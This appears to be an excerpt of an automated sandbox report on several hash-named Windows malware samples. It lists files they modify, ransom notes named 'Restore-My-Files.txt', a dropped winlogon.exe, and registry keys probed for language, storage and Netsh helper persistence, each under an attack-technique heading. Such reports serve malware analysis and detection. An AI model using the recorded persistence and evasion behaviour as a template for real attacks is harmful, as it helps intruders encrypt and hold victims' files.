File opened for modification C:\Program Files\Microsoft Office\Office16\OSPPREARM.EXE C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeStudentR_Retail-ppd.xrm-ms C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\SETLANG.HXS C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\it-IT\mshwLatin.dll.mui C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File created C:\Program Files\Common Files\microsoft shared\ink\sv-SE\Restore-My-Files.txt C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\Restore-My-Files.txt C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\hwrcommonlm.dat C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProfessionalR_Trial-ul-oob.xrm-ms C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Word2019R_Retail-pl.xrm-ms C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File created C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\oskmenu\Restore-My-Files.txt C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\classlist C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\jfr.jar C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProfessionalPipcR_OEM_Perp-ppd.xrm-ms C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\STSLIST.CHM C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\7-Zip\License.txt C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\en-GB\tipresx.dll.mui C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\GRAPH.HXS C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File created C:\Program Files\Common Files\microsoft shared\ink\da-DK\Restore-My-Files.txt C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Common Files\System\msadc\adcvbs.inc C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PSRCHLEX.DAT C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_604443294\sets.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_383677895\autofill_bypass_cache_forms.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_584358136\typosquatting_list.pb C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_1903774412\manifest.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_16235238\manifest.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_787291217\deny_domains.list C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_787291217\deny_etld1_domains.list C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_787291217\deny_full_domains.list C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_383677895\manifest.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_1641183958\data.txt C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_1641183958\manifest.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_1961446077\typosquatting_list.pb C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_16235238\well_known_domains.dll C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_441743978\manifest.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_441743978\protocols.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_441743978\manifest.fingerprint C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_604443294\LICENSE C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_383677895\v1FieldTypes.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_1903774412\ct_config.pb C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_604443294\manifest.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_383677895\edge_autofill_global_block_list.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_1961446077\manifest.fingerprint C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_1903774412\kp_pinslist.pb C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\SystemTemp C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_604443294\_metadata\verified_contents.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_604443294\manifest.fingerprint C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_1641183958\manifest.fingerprint C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_1903774412\manifest.fingerprint C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\winlogon.exe C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_584358136\manifest.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_584358136\safety_tips.pb C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_1682189713\keys.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_1682189713\_metadata\verified_contents.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_787291217\manifest.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_787291217\manifest.fingerprint C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_1903774412\crs.pb C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\assembly\Desktop.ini C:\Users\Admin\Downloads\d4c62215df74753371db33a19a69fccdc4b375c893a4b7f8b30172710fbd4cfa\d4c62215df74753371db33a19a69fccdc4b375c893a4b7f8b30172710fbd4cfa.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_1682189713\LICENSE C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_1682189713\manifest.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_1682189713\manifest.fingerprint C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_584358136\_metadata\verified_contents.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_1961446077\manifest.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\winlogon.exe C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Windows\assembly C:\Users\Admin\Downloads\d4c62215df74753371db33a19a69fccdc4b375c893a4b7f8b30172710fbd4cfa\d4c62215df74753371db33a19a69fccdc4b375c893a4b7f8b30172710fbd4cfa.exe N/A
File opened for modification C:\Windows\assembly\Desktop.ini C:\Users\Admin\Downloads\d4c62215df74753371db33a19a69fccdc4b375c893a4b7f8b30172710fbd4cfa\d4c62215df74753371db33a19a69fccdc4b375c893a4b7f8b30172710fbd4cfa.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_383677895\regex_patterns.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_383677895\manifest.fingerprint C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_584358136\manifest.fingerprint C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_16235238\manifest.fingerprint C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Browser Information Discovery

discovery

Command and Scripting Interpreter: JavaScript

execution

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tmp1.jpg N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\a30306497eb18f549407b8e26ffeb285405433cb160a6001b8aede53e3accfd3\a30306497eb18f549407b8e26ffeb285405433cb160a6001b8aede53e3accfd3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\ipconfig.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba\537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\d765e722e295969c0a5c2d90f549db8b89ab617900bf4698db41c7cdad993bb9\d765e722e295969c0a5c2d90f549db8b89ab617900bf4698db41c7cdad993bb9.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\winlogon.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\winlogon.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 C:\Windows\system32\dwm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Windows\system32\dwm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Capabilities C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID C:\Windows\explorer.exe N/A
